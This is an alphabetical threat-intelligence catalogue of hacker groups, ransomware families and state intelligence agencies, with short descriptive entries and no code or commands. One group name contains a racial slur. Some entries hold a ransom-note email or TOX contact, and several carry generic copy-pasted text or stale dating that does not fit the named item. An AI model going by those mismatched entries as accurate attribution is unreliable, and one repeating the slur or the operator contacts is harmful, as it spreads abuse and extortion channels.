The Cyber Army of Russia is a threat group that appears to carry out cyber attacks in line with Russian strategic interests. The group has claimed many distributed denial of service (DDoS) attacks against a variety of targets perceived as opposed to Russian interests. More recently, it has claimed disruptive industrial software-based attacks against water utilities in the United States, France, and Poland. Researchers link the Cyber Army of Russia to APT44 / Sandworm Team, although it remains unclear what level of direct support, if any, is provided by the latter group.[[Wired Cyber Army of Russia April 17 2024](/references/53583baf-4e09-4d19-9348-6110206b88be)][[Mandiant APT44 April 17 2024](/references/a64f689e-2bb4-4253-86cd-545e7f633a7e)]

Cyber Av3ngers

The CyberAv3ngers are a suspected Iranian Government Islamic Revolutionary Guard Corps (IRGC)-affiliated APT group. The CyberAv3ngers have been known to be active since at least 2020, with disputed and false claims of critical infrastructure compromises in Israel. [CISA AA23-335A IRGC-Affiliated December 2023](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a) In 2023, the CyberAv3ngers engaged in a global targeting and hacking of the Unitronics Programmable Logic Controller (PLC) with Human-Machine Interface (HMI). This PLC can be found in multiple sectors, including water and wastewater, energy, food and beverage manufacturing, and healthcare. The most notable feature of this attack was the defacement of the devices user interface. [CISA AA23-335A IRGC-Affiliated December 2023](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a)

Cyber Berkut

Cyber Berkut is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Cyber Caliphate Army

Cyber Caliphate Army is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Cyber Drill Exercise

It is aimed at English-speaking users and can therefore infect victims worldwide. It is spread via email spam, fake updates, attachments and so on. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc.

Cyber fighters of Izz Ad-Din Al Qassam

Cyber fighters of Izz Ad-Din Al Qassam is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Cyber Islamic Resistance

Cyber Islamic Resistance is a hacktivist collective ideologically aligned with Iran, engaging in operations such as website defacements, DDoS attacks, and data exfiltration targeting Israeli and Western entities. They have claimed breaches of Israeli cybersecurity firms and academic platforms, framing their actions as part of a broader narrative of retaliation. The group has also targeted critical infrastructure, asserting access to industrial control systems and operational technology environments. Their activities are often presented as part of a coordinated cyber mobilization campaign, emphasizing psychological and reputational impacts.

Cyber Partisans

The Cyber Partisans, a hacktivist group based in Belarus, has been involved in various cyber-attacks targeting organizations and infrastructure in Belarus and Ukraine. They have hacked and wiped the network of the Belarusian Telegraph Agency, targeted the Belarusian Red Cross, and conducted ransomware attacks on the Belarusian Railway and Belarusian State University. The group aims to expose alleged crimes committed by pro-government organizations and disrupt operations supporting the Russian military operation against Ukraine. They have also leaked stolen data to journalists and expressed support for Ukraine.

Cyber Police HT

Ransomware

Cyber Serp

UAC-0255 is a threat actor that conducted a phishing campaign impersonating CERT-UA to distribute the AGEWHEEZE RAT, targeting organizations in Ukraine's public and private sectors. The campaign is part of a broader trend of using trusted identities to enhance victim engagement, as seen in previous activities like UAC-0190 and UAC-0252. CERT-UA identified UAC-0255 after discovering links to the CyberSerp Telegram channel, which claimed responsibility for the attack. The activity is documented under the identifier CERT-UA#21075, with detection rules available for cybersecurity analysts.

Cyber SpLiTTer Vbs

Ransomware Based on HiddenTear

Cyber Toufan

Cyber Toufan is a threat actor group that has gained prominence for its cyberattacks targeting Israeli organizations. The group's tactics suggest potential nation-state backing, possibly from Iran. They have been involved in hack-and-leak operations, data breaches, and data destruction, impacting over 100 organizations. Cyber Toufan's activities align with geopolitical tensions in the Middle East and their attacks are characterized by a combination of technical breaches and psychological warfare.

CyberDrill2

Ransomware

Cyberex

Cyberex is an active extortion or ransomware group tracked by RansomLook.

CyberNiggers

CyberNiggers is a threat group known for breaching various organizations, including the US military, federal contractors, and multinational corporations like General Electric. Led by the prominent member IntelBroker, they specialize in selling access to compromised systems and stealing sensitive data, such as military files and personally identifiable information. The group has targeted a diverse portfolio of organizations, showcasing their strategic approach to gathering varied sets of information. Their activities raise concerns about national security, individual privacy, and the need for robust cybersecurity measures to mitigate the impact of cyber adversaries.

CyberResearcher

Ransomware

CyberSCCP

Ransomware

CyberSoldier

Ransomware

CyberVolk

CyberVolk is a politically motivated hacktivist collective originating in India with pro-Russia leanings. The group is known for launching ransomware and DDoS attacks to undermine and disrupt operations of entities that are perceived to be opposed to Russian interests.[[SentinelOne November 25 2024](/references/71c8e60c-a72a-4bff-aae3-f3f155fa22ee)]

Cyborg Ransomware

Ransomware delivered using fake Windows Update spam

Cyclone

Ransomware

cyclops

Cyclops ransomware was rebranded as Knight around mid‑2023, emerging initially in early 2023. It operates as a Ransomware-as-a-Service (RaaS), targeting multiple platforms including Windows, macOS, Linux, and ESXi systems. Crafted in Go, it uses strong encryption algorithms like ChaCha20 and Curve25519. Knight includes both a full and "lite" encryptor, supports batch attacks, hosts a Tor leak site, and offers a web portal for affiliates—positioning itself as a scalable and partner-friendly ransomware operation. Affiliates can manage deployments, track payments, and negotiate with victims through a sophisticated RaaS platform.

Cylance

Cylance is an active extortion or ransomware group tracked by RansomLook.

CypherPy

Ransomware

Cyprus Intelligence Service

Cyprus Intelligence Service (CIS) (Κυπριακή Υπηρεσία Πληροφοριών, ΚΥΠ), formerly the Central Intelligence Service (KYP).

CYR-Locker Ransomware (FAKE)

This is most likely to affect English-speaking users, since the note is written in English; because English is understood worldwide, anyone can be harmed. The attacker spreads the malware using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc. The following note is shown if the wrong key code is entered: https://3.bp.blogspot.com/-qsS0x-tHx00/WLM3kkKWKAI/AAAAAAAAEDg/Zhy3eYf-ek8fY5uM0yHs7E0fEFg2AXG-gCLcB/s1600/failed-key.jpg

Cyrat

ransomware

Cyron

Ransomware that claims it detected "Children Pornsites" in the victim's browser history.

Cyspt

Ransomware

Czech

Ransomware

D00mEd

Ransomware

d0glun

D0glun is a crypto-ransomware strain first observed in January 2025, believed to be derived from Babuk via an intermediary variant known as Cheng Xilun. It uses AES-256 symmetric encryption and appends filenames with patterns such as .@D0glun@ or similar. The malware encrypts files rapidly, changes the desktop wallpaper, and drops ransom notes typically named @[email protected], Desktopcxl.txt, or help.exe. The campaign has shown signs of shared infrastructure and code reuse from Cheng Xilun, but there is no confirmed evidence of a large-scale or mature operation. Its activity so far suggests it is being tested or deployed by a small group or individual rather than a structured affiliate network.

D2+D

Ransomware

d4rk4rmy

D4rk4rmy is a data-extortion focused threat actor that emerged in mid-2025, targeting high-profile organizations across sectors like financial services, hospitality, and education. It operates primarily through leak site extortion rather than encryption, listing prominent entities—such as Bridgewater Associates, Magellan Financial, Onex Canada Asset Management, Tsai Capital, Casino de Monte-Carlo, and others—on its Tor-based platform. The group has also hit victims in technology, logistics, and university sectors across multiple continents. Their tactic centers on reputation manipulation and public exposure to pressure victims into negotiations.

DAGGER PANDA

Operating since at least 2011 from several locations in China, with members in Korea and Japan as well. Possibly linked to Onion Dog. This threat actor targets government institutions, military contractors, maritime and shipbuilding groups, telecommunications operators, and others, primarily in Japan and South Korea.

Dagonlocker

Dagon Locker is a double-extortion ransomware family that surfaced around September 2022. It represents an evolution of the MountLocker and Quantum ransomware lines. The group employs strong encryption using ChaCha20 protected by RSA-2048 and appends the .dagoned extension to encrypted files. It provides operators flexibility through command-line options to control encryption behavior, such as skipping logs, deletions, or process termination. Notably, Dagon Locker is frequently distributed via phishing campaigns and as part of Brodin-based initial access chains. It operates under a Ransomware-as-a-Service (RaaS) model, engaging affiliates to launch customized campaigns—particularly targeting organizations in South Korea.

Dairat al-Mukhabarat al-Ammah

General Intelligence Department (GID) - (Da’irat al-Mukhabarat al-’Ammah)

Daixin Team

Daixin is a threat actor group that has been active since at least June 2022. They primarily target the healthcare and public health sector with ransomware attacks, stealing sensitive data and threatening to release it if a ransom is not paid. They have successfully targeted various industries, including healthcare, aerospace, automotive, and packaged foods. Daixin gains initial access through VPN servers and exploits vulnerabilities or uses phishing attacks to obtain credentials. They have been responsible for cyberattacks on organizations such as the North Texas Municipal Water District and TransForm Shared Service Org, impacting their networks and stealing customer and patient information.

Daixin

Daixin Team is a ransomware and data extortion group active since at least June 2022, known for targeting the healthcare sector, including hospitals, clinics, and related service providers. The group employs a double-extortion model—exfiltrating sensitive data before encrypting systems—and has leaked protected health information (PHI) to pressure victims. Intrusions often involve exploiting VPN vulnerabilities (notably in Fortinet FortiOS) and using compromised credentials for initial access. The ransomware uses AES for file encryption with RSA to protect the keys, and ransom notes direct victims to a Tor-based portal. The U.S. CISA, FBI, and HHS have issued joint advisories warning of the group’s impact on healthcare delivery and patient safety.

Dalbit

The group usually targets vulnerable servers, either stealing information such as companies' internal data or encrypting files and demanding money. Its targets are usually poorly managed Windows servers that are not patched to the latest version. There have also been attacks targeting email servers and MS-SQL database servers.

Dale Ransomware

It is aimed at English-speaking users and can therefore infect victims worldwide. It is spread via email spam, fake updates, attachments and so on. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc. CHIP > DALE

Damage Ransomware

This is most likely to affect English-speaking users, since the note is written in English; because English is understood worldwide, anyone can be harmed. The attacker spreads the malware using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc. Written in Delphi.

dan0n

dAn0n is a data-extortion actor that first appeared in April 2024. Operating primarily in a leak-focused extortion model, they publish stolen data on a Tor-hosted site rather than encrypting files. Their victims include organizations across sectors like business services, technology, healthcare, transportation, and legal—all largely based in the United States, with a few in Ireland and South Korea. Activity surged in May 2024, landing them in the top 10 most active ransomware actors that month. Despite limited branding efforts, their smaller operational footprint has allowed for swift, targeted breaches that prioritize rapid data exposure over elaborate cryptographic tactics.

Dancing Salome

Dancing Salome is the Kaspersky codename for an APT actor with a primary focus on ministries of foreign affairs, think tanks, and Ukraine. What makes Dancing Salome interesting and relevant is the attacker’s penchant for leveraging HackingTeam RCS implants compiled after the public breach.

Dangerous Ransomware

This is most likely to affect English-speaking users, since the note is written in English; because English is understood worldwide, anyone can be harmed. The attacker spreads the malware using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc.

DangerousSavanna

Malicious campaign called DangerousSavanna has been targeting multiple major financial service groups in French-speaking Africa for the last two years. The threat actors behind this campaign use spear-phishing as a means of initial infection, sending emails with malicious attachments to the employees of financial institutions in at least five different French-speaking countries: Ivory Coast, Morocco, Cameroon, Senegal, and Togo. DangerousSavanna tends to install relatively unsophisticated software tools in the infected environments. These tools are both self-written and based on open-source projects such as Metasploit, PoshC2, DWservice, and AsyncRAT. The threat actors’ creativity is on display in the initial infection stage, as they persistently pursue the employees of the targeted companies, constantly changing infection chains that utilize a wide range of malicious file types, from self-written executable loaders and malicious documents, to ISO, LNK, JAR and VBE files in various combinations. The evolving infection chains by the threat actor reflect the changes in the threat landscape seen over the past few years as infection vectors became more and more sophisticated and diverse.

Danish Defence Intelligence Service

Danish Defence Intelligence Service (Forsvarets Efterretningstjeneste (FE)).

Danish Security and Intelligence Service

Danish Security and Intelligence Service (Politiets Efterretningstjeneste (PET)).

Danti

Danti is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Dark Basin

Dark Basin is a hack-for-hire group that has targeted thousands of individuals and hundreds of institutions on six continents. Targets include advocacy groups and journalists, elected and senior government officials, hedge funds, and multiple industries. Dark Basin extensively targeted American nonprofits, including organisations working on a campaign called #ExxonKnew, which asserted that ExxonMobil hid information about climate change for decades. We also identify Dark Basin as the group behind the phishing of organizations working on net neutrality advocacy, previously reported by the Electronic Frontier Foundation. We link Dark Basin with high confidence to an Indian company, BellTroX InfoTech Services, and related entities.

Dark Shinigami

Dark Shinigami is an active extortion or ransomware group tracked by RansomLook.

Darkangel

Dark Angels is a highly targeted ransomware and data-extortion group that emerged in spring 2022. Rather than using an affiliate-driven model, it orchestrates discreet, high-impact attacks on large organizations—often choosing one Fortune-level victim at a time. The group exfiltrates massive volumes of data (sometimes 10–100 TB), optionally deploys encryption on Windows or ESXi systems, and pressures victims via a Tor-hosted leak platform ("Dunghill Leak"). Their notable incidents include extorting a record $75 million from a Fortune 50 company in 2024 and demanding around $51 million from Johnson Controls. Dark Angels’ operations emphasize stealth and precision over disruption, often avoiding high-profile media exposure and operating with low operational visibility.

Darkbit01

TOX: AB33BC51AFAC64D98226826E70B483593C81CB22E6A3B504F7A75348C38C862F00042F5245AC

DarkCasino

DarkCasino is an economically motivated APT group that targets online trading platforms, including cryptocurrencies, online casinos, network banks, and online credit platforms. They are skilled at stealing passwords to access victims' online accounts and have been active for over a year. DarkCasino exploits vulnerabilities, such as the WinRAR vulnerability CVE-2023-38831, to launch phishing attacks and steal online property.

DarkGaboon

DarkGaboon is a financially motivated APT group that has been independently targeting Russian organizations since May 2023, primarily using phishing emails to deliver malware such as Revenge RAT and LockBit 3.0 ransomware. Their operations demonstrate advanced operational security practices, including the use of homoglyphs in file names and decoy documents sourced from legitimate Russian templates to evade detection. The group has shown a disciplined approach to updating their toolkit, with 369 unique files identified, and employs command-and-control infrastructure located outside Russia. DarkGaboon's linguistic proficiency in Russian suggests a deep understanding of the local context, enhancing the effectiveness of their phishing lures.

darkhav0c

darkhav0c is an active extortion or ransomware group tracked by RansomLook.

DarkKomet

Ransomware

DarkLocker

Ransomware

DarkoderCryptor

Ransomware

DarkPink

DarkPink is an APT group that has been active since mid-2021, primarily targeting government, military, and non-profit organizations in Southeast Asia and Europe. The group employs spear phishing techniques, utilizing ISO images and malicious PDF files to deliver custom Trojan programs like TelePowerBot and KamiKakaBot for information theft. They have exploited vulnerabilities such as CVE-2023-38831 to enhance their attack processes and maintain persistence through DLL side-loading and scheduled tasks. DarkPink's operations are characterized by stealth and precision, making them a significant threat in the cyber landscape.

DarkRaaS

DarkRaaS is a threat actor specializing in selling unauthorized access to various organizations' systems and networks across multiple countries, with a recent focus on targets in Israel, UAE, Turkey, and South America. The group has been operating for at least six years and typically offers access to sensitive data, internal systems, and infrastructure, with prices ranging up to $25,000 for VPN access. Their targets span various sectors including government institutions, educational facilities, oil and gas companies, and IT organizations, often claiming to have access to multiple terabytes of sensitive data.

darkrace

DarkRace is a moderately destructive ransomware strain observed since 2024. It encrypts files and appends a randomized extension (e.g., .1352FF327) that varies per victim. Implemented as a 32-bit Windows application, it disables antivirus defenses, deletes volume shadow copies, terminates processes, and drops ransom note files for payment negotiation. Technical weaknesses in its encryption have enabled developers to produce a universal decryptor that works against DarkRace and related variants.

Darkrypt

Darkrypt is an active extortion or ransomware group tracked by RansomLook.

Darkside

Darkside, the latest ransomware operation to emerge, has been attacking organizations since earlier this month. Darkside’s customized attacks on companies have already garnered them million-dollar payouts. Through their “press release”, these threat actors have claimed to be affiliated with prior ransomware operations that made millions of dollars. They stated that they created this new product to match their needs, as prior products didn’t. Darkside explains that they only target companies they know can pay the specified ransom. They have allegedly promised that they will not attack the following sectors: medicine, education, non-profit organizations, and the government sector.

DarkSpectre

DarkSpectre is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Darkvault

DarkVault is a versatile and opportunistic threat actor first observed in late 2023. Rather than being a traditional ransomware operation, it acts broadly as a data broker and extortion ensemble, publishing victim information—like company names and industries—via Tor-leak sites. Activities reportedly include doxing, website defacement, bomb threats, malware distribution, and swatting, suggesting a diversified cybercriminal portfolio beyond simple ransomware, often framed as an "exclusive online community." While the leak site design mirrors LockBit 3.0, there is no verified technical evidence linking DarkVault to LockBit's codebase. No ransomware executables or encryption tools have been confirmed; its role appears centered on data exposure and extortion without enforced file encryption.

darkwave

Ransomware written in Python.

darkylock

Darky Lock is a commodity-style ransomware strain first identified in July 2022, derived from publicly available Babuk source code. Victim systems undergo file encryption with an added “.darky” extension, and a “Restore-My-Files.txt” ransom note is placed in all impacted locations. The malware attempts to disable backup mechanisms, including shadow copies and specific applications. Its distribution leverages phishing and trojanized installers, complemented by payloads dropped via frameworks like Empire, Metasploit, and Cobalt Strike.

Datacarry

DataCarry is a newly observed ransomware and data-extortion operation, first seen in May 2025. It operates a double-extortion model, exfiltrating data and threatening publication via a Tor-hosted portal. The group has already claimed multiple victims across diverse sectors including insurance, healthcare, real estate, retail, and aerospace in countries such as Latvia, Belgium, Türkiye, South Africa, Switzerland, Denmark, and the United Kingdom. The rapid emergence and multi-country reach signal a well-organized operation.

Datacloud

ransomware

dataf locker

DataF Locker is a ransomware variant first observed in 2024, closely tied to the Babuk ransomware lineage. It operates under a double-extortion model, encrypting files by appending the .dataf extension and threatening to leak exfiltrated data if the ransom isn't paid. Victims receive a ransom note named How To Restore Your Files.txt, which sets out the recovery procedure. Observations suggest use of typical intrusion vectors such as phishing, exploit tools, or leaked credential abuse, although detailed delivery methods and leak infrastructure remain under-documented in high-tier intelligence reports.

DataKeeper

Ransomware

Dataleak

Dataleak is an active extortion or ransomware group tracked by RansomLook.

Datebatut

Ransomware

DBGer Ransomware

The authors of the Satan ransomware have rebranded their "product" and they now go by the name of DBGer ransomware, according to security researcher MalwareHunter, who spotted this new version earlier today. The change was not only in name but also in the ransomware's modus operandi. According to the researcher, whose discovery was later confirmed by an Intezer code similarity analysis, the new (Satan) DBGer ransomware now also incorporates Mimikatz, an open-source password-dumping utility. The purpose of DBGer incorporating Mimikatz is for lateral movement inside compromised networks. This fits a recently observed trend in Satan's modus operandi.

DCRTR-WDM

Ransomware

DCRTR

Ransomware

DCry

Ransomware

DDE

Ransomware

DEA Office of National Security Intelligence

DEA Office of National Security Intelligence (ONSI)

Deadbydawn

Deadbydawn is an active extortion or ransomware group tracked by RansomLook.

Deadeye Jackal

The Syrian Electronic Army (SEA) is a group of computer hackers which first surfaced online in 2011 to support the government of Syrian President Bashar al-Assad. Using spamming, website defacement, malware, phishing, and denial of service attacks, it has targeted political opposition groups, western news organizations, human rights groups and websites that are seemingly neutral to the Syrian conflict. It has also hacked government websites in the Middle East and Europe, as well as US defense contractors. As of 2011 the SEA made Syria *the first Arab country to have a public Internet Army hosted on its national networks to openly launch cyber attacks on its enemies*. The precise nature of SEA's relationship with the Syrian government has changed over time and is unclear.

Deadly Ransomware

This is most likely to affect English-speaking users, since the note is written in English; because English is understood worldwide, anyone can be harmed. The attacker spreads the malware using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc. The sample is set to encrypt only in 2017.

DeadSec-Crypto

Ransomware

DearCry

ransomware

Death Bitches

Ransomware

deathgrip

DeathGrip is a Ransomware-as-a-Service (RaaS) that emerged around June 2024, offering malware payloads built with leaked LockBit 3.0 and Yashma/Chaos builders. Designed to lower technical barriers, it enables even low-skilled operators to deploy highly capable ransomware attacks. DeathGrip campaigns typically employ AES-256 encryption, delete shadow copies and recovery features, and modify system settings to hinder restoration. Earlier infections include low-tier ransom demands (e.g., around $100), reflecting entry-level targeting, though its flexible tooling allows a range of payload configurations.

DeathHiddenTear (Large&Small HT)

Ransomware

DeathNote

Ransomware

DeathOfShadow

ransomware

DeathRansom

Ransomware

DEcovid19

ransomware

DeCrypt Protect

Ransomware

DecryptFox Ransomware

Michael Gillespie found a new ransomware uploaded to ID Ransomware that appends the .encr extension and drops a ransom note named readmy.txt.

DecryptIomega

Ransomware

Decryption Assistant

Ransomware

DecService

Ransomware

DecYourData

Ransomware

DEDCryptor

Ransomware Based on EDA2

Defence Intelligence Agency (Nigeria)

Defence Intelligence Agency (Military Intelligence)

Defence Intelligence Command

Defence Intelligence Command (DIC)

Defence Intelligence Organisation

Defence Intelligence Organisation (DIO)

Defence Intelligence

Defence Intelligence (DI) – Military intelligence analysis.

Defender

Ransomware

Defense Intelligence Agency (South Korea)

Defense Intelligence Agency (DIA)

Defense Intelligence Agency

Defense Intelligence Agency (DIA)

Defense Intelligence Headquarters

Defense Intelligence Headquarters (DIH)

Defense Security Support Command

Defense Security Support Command (DSSC)

Defray (Glushkov)

Ransomware

DefrayX

DefrayX is a threat actor group known for their RansomExx ransomware operations. They primarily target Linux operating systems, but also release versions for Windows. The group has been active since 2018 and has targeted various sectors, including healthcare and manufacturing. They have also developed other malware strains such as PyXie RAT, Vatet loader, and Defray ransomware.

Delta

Delta is an active extortion or ransomware group tracked by RansomLook.

DEMIAP

General Staff of Military Intelligence (ex-DEMIAP)

Demo

Ransomware that only encrypts .jpg files.

Denim Tsunami

Denim Tsunami is a threat actor group that has been involved in targeted attacks against European and Central American customers. They have been observed using multiple Windows and Adobe 0-day exploits, including one for CVE-2022-22047, which is a privilege escalation vulnerability. Denim Tsunami developed a custom malware called Subzero, which has capabilities such as keylogging, capturing screenshots, data exfiltration, and running remote shells. They have also been associated with the Austrian spyware distributor DSIRF.

Deos

Ransomware

Department of Border Affair (DBA)

Department of Border Affair (DBA)

Department of Homeland Security (Spain)

Department of Homeland Security (DSN)

Department of Naval Intelligence

Department of Naval Intelligence

Department of Smuggling, Intelligence, Operations and Information Collection

Department of Smuggling, Intelligence, Operations and Information Collection (intelligence coordination)

DeriaLock Ransomware

It is aimed at English-speaking users and can therefore infect victims worldwide. It is spread via email spam, fake updates, attachments and so on. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc. The maker is arizonacode and the ransom amount is $20–30. If the victim decides to pay the ransom, they have to copy their HWID, contact the hacker on Skype, and forward the payment.

DeroHE

ransomware

Desktop

Ransomware

Desolated

Desolated is an active extortion or ransomware group tracked by RansomLook.

Desolator

Desolator is an active extortion or ransomware group tracked by RansomLook.

Desorden Group

Desorden (Spanish for "Disorder", previously known as ChaosCC) is a financially motivated hacker group. The group first emerged under the new name Desorden in September 2021 on Raidforums. Today the group maintains users under that name on several popular English-speaking hacking forums, where they share their attacks and ransom demands and offer databases for sale. The group gained an excellent reputation among the cybercriminal communities due to their successful operations and the unique data that they share and offer for sale.

Desync

This crypto ransomware encrypts enterprise LAN data with AES (ECB mode), and then requires a ransom in # BTC to return the files.

Detective Branch, Bangladesh Police

Detective Branch (DB)

DetoxCrypto

Ransomware - Based on Detox: Calipso, We are all Pokemons, Nullbyte

Deuxième Bureau (Morocco)

Deuxième Bureau (Morocco) - Military secret service

DEV-0147

DEV-0147 is a China-based cyber espionage actor that was observed compromising diplomatic targets in South America, a notable expansion of the group's data exfiltration operations, which traditionally targeted government agencies and think tanks in Asia and Europe. DEV-0147 is known to use tools like ShadowPad, a remote access trojan associated with other China-based actors, to maintain persistent access, and QuasarLoader, a webpack loader, to deploy additional malware. DEV-0147's attacks in South America included post-exploitation activity involving the abuse of on-premises identity infrastructure for reconnaissance and lateral movement, and the use of Cobalt Strike for command and control and data exfiltration.

DEV-0270

Microsoft threat intelligence teams have been tracking multiple ransomware campaigns and have tied these attacks to DEV-0270, also known as Nemesis Kitten, a sub-group of Iranian actor PHOSPHORUS. Microsoft assesses with moderate confidence that DEV-0270 conducts malicious network operations, including widespread vulnerability scanning, on behalf of the government of Iran.

DEV-0569

DEV-0569, also known as Storm-0569, is a threat actor group that has been observed deploying the Royal ransomware. They utilize malicious ads and phishing techniques to distribute malware and gain initial access to networks. The group has been linked to the distribution of payloads such as Batloader and has forged relationships with other threat actors. DEV-0569 has targeted various sectors, including healthcare, communications, manufacturing, and education in the United States and Brazil.

DEV-0586

MSTIC has not found any notable associations between this activity, tracked as DEV-0586, and other known activity groups. MSTIC assesses that the malware (WhisperGate), which is designed to look like ransomware but lacks any ransom recovery mechanism, is intended to be destructive: it renders targeted devices inoperable rather than obtaining a ransom.

DEV-0928

DEV-0928 is a threat actor that has been tracked by Microsoft since September 2022. They are known for their involvement in high-volume phishing campaigns, using tools offered by DEV-1101. DEV-0928 sends phishing emails to targets and has been observed launching campaigns involving millions of emails. They also utilize evasion techniques, such as redirection to benign pages, to avoid detection.

DEV-0950

Lace Tempest, also known as DEV-0950, is a threat actor that exploited vulnerabilities in software such as SysAid and PaperCut to gain unauthorized access to systems. Lace Tempest is known for deploying the Clop ransomware and exfiltrating data from compromised networks.

DEV-1028

Microsoft reported on MCCrash, an IoT botnet operated by the DEV-1028 threat actor and used to launch DDoS attacks against private Minecraft servers.

Devman Ransomware Group

Devman is a ransomware operation that has reportedly developed its own custom encryptor software, while also reportedly collaborating with other ransomware groups including Qilin, DragonForce, and RansomHub.[[Cyble Safepay Devman June 3 2025](/references/49840002-47ee-4a77-9ceb-577752798dc0)][[AhnLab Dark Web Trends June 10 2025](/references/de36cb84-6eaf-4a67-b09b-b876af38ccb5)]

Devman

DevMan is a ransomware variant first observed in April 2025. It is a customized derivative of the DragonForce family, leveraging attacker-operated infrastructure for double-extortion, where both data theft and encryption are employed to pressure victims. The threat is highly organized, targeting sectors such as technology, construction, public services, healthcare, and consumer services across Asia, Africa, and Europe.

devman2

DevMan 2.0 is the evolved iteration of the DevMan ransomware, first documented in July 2025. It enhances the capabilities of its predecessor with robust double-extortion tactics and operates under a Ransomware-as-a-Service (RaaS) model, offering structured leak and extortion infrastructure. Affiliates and operators are using it across diverse sectors—such as manufacturing, retail, and electronics—targeting organizations in Japan, Germany, and other countries. Demands from initial campaigns range widely, spanning from around $1 million to over $10 million USD.

Devos

Ransomware

DEXTOROUS SPIDER

DEXTOROUS SPIDER is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Dharma Ransomware

It targets English-speaking users and so can infect victims worldwide. It is spread via email spam, fake updates and malicious attachments, and encrypts files including music, MS Office and OpenOffice documents, pictures, videos and shared online files. Lineage: CrySiS > Dharma (a CrySiS variant). Ransom note: "ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com".

dharma

Dharma is a prolific ransomware family active since at least 2016, evolving from the earlier CrySiS ransomware. It operates under a Ransomware-as-a-Service (RaaS) model, allowing affiliates to deploy customized builds with their own contact emails and extensions. Dharma typically appends encrypted files with patterns like .id-[victimID].[email].dharma or other campaign-specific suffixes. Initial access is often gained through exposed Remote Desktop Protocol (RDP) services protected by weak or stolen credentials, sometimes combined with brute-force attacks. The malware encrypts files with AES and protects the AES keys with RSA, then drops ransom notes as text files and pop-up windows. Numerous variants have emerged over time, each linked to different affiliates, which makes attribution difficult.

DHS Office of Intelligence and Analysis

DHS Office of Intelligence and Analysis (I&A)

Diamond

Ransomware

Diavol

A ransomware with potential ties to Wizard Spider.

DiceyF

DiceyF is an advanced persistent threat group that has been targeting online casinos and other victims in Southeast Asia for an extended period. They have exhibited overlapping activity with LuckyStar PlugX and Earth Berberoka/GamblingPuppet, as reported by various cybersecurity vendors. While their motivations remain unclear, previous incidents suggest a combination of espionage and intellectual property theft rather than immediate financial gain. DiceyF continuously evolves their codebase and adds encryption capabilities to enhance their stealthy cyberespionage activities.

DieNet

DieNet is a hacktivist group that emerged in March 2025, known for conducting DDoS attacks targeting entities associated with political figures, such as Trump businesses. The group has claimed responsibility for disabling ten significant Iraqi websites, framing the action as support for their affiliates in the “Shiite Harvest.” Their operations suggest motivations rooted in sectarian dynamics, with a coordinated effort indicated by the use of hashtags like #DieNet and #Shiite_Harvest. This reflects the use of cyber offensives as tools for political and ideological expression, mirroring offline sectarian tensions.

Digisom

Ransomware

Digital Security Agency

Digital Security Agency

DilmaLocker

Ransomware

Direcția Generală de Informații a Apărării

General Directorate for Defense Intelligence (DGIA) – Direcția Generală de Informații a Apărării

Direcția Generală de Informații și Protecție Internă

General Directorate for Internal Security (DGPI) – Direcția Generală de Protecție Internă

Dirección de Contra-Inteligencia Militar

Military Counterintelligence Directorate

Dirección de Observaciones Judiciales

Directorate of Judicial Surveillance (DOJ) – Dirección de Observaciones Judiciales

Dirección General de Contrainteligencia Militar

Directorate General of Military Counterintelligence (DGCIM) – Dirección General de Contrainteligencia Militar

Dirección Nacional de Inteligencia Criminal

National Directorate of Criminal Intelligence (DNIC) – Dirección Nacional de Inteligencia Criminal

Dirección Nacional de Inteligencia Estratégica Militar

National Directorate of Strategic Military Intelligence (DNIEM) – Dirección Nacional de Inteligencia Estratégica Militar

Direction du renseignement militaire

Directorate of Military Intelligence (DRM; Direction du renseignement militaire) – Military intelligence.

Direction Generale pour l'Etude et la Documentation

General Directorate for Studies and Documentation (DGED) – Direction Generale pour l'Etude et la Documentation

Direction Nationale du Renseignement et des Enquêtes Douanières

Direction Nationale du Renseignement et des Enquêtes Douanières (DNRED)

Direction Nationale du Renseignement Territorial (DNRT)

Direction Nationale du Renseignement Territorial (DNRT)

Director of National Intelligence

Office of the Director of National Intelligence (ODNI)

Directorate-General for External Security

Directorate-General for External Security (DGSE; Direction générale de la sécurité extérieure) – Foreign intelligence relating to national security.

Directorate General of Customs and Excise (Indonesia)

Customs & Excise Sub-Directorate of Intelligence – Sub-Direktorat Intelijen Direktorat Jenderal Bea Cukai

Directorate General of Forces Intelligence

Directorate General of Forces Intelligence (DGFI)

Directorate General of GST Intelligence

Directorate General of GST Intelligence (DGGI)[11]

Directorate General of Immigration (Indonesia)

Directorate of Immigration Intelligence – Direktorat Intelijen Imigrasi

Directorate General of Intelligence and Investigation

Directorate-General of Intelligence and Investigation (DGII)

Directorate of Air Intelligence (India)

Directorate of Air Intelligence

Directorate of Intelligence and Security

Directorate of Intelligence and Security Services (DISS) – espionage and counter-intelligence unit under the Ministry of State President

Directorate of Intelligence Royal Thai Army (DINTRTA)

Directorate of Intelligence Royal Thai Army (DINTRTA)

Directorate of Intelligence, RTAF (INTELLRTAF)

Directorate of Intelligence, RTAF (INTELLRTAF)

Directorate of Joint Intelligence (DJI)

Directorate of Joint Intelligence (DJI)

Directorate of Military Intelligence (Ireland)

Directorate of Military Intelligence (G2)

Directorate of Military Intelligence, Nepal

Directorate of Military Intelligence (DMI)

Directorate of Military Intelligence (Sri Lanka)

Directorate of Military Intelligence (Sri Lanka)

Directorate of Naval Intelligence (India)

Directorate of Naval Intelligence

Directorate of Revenue Intelligence

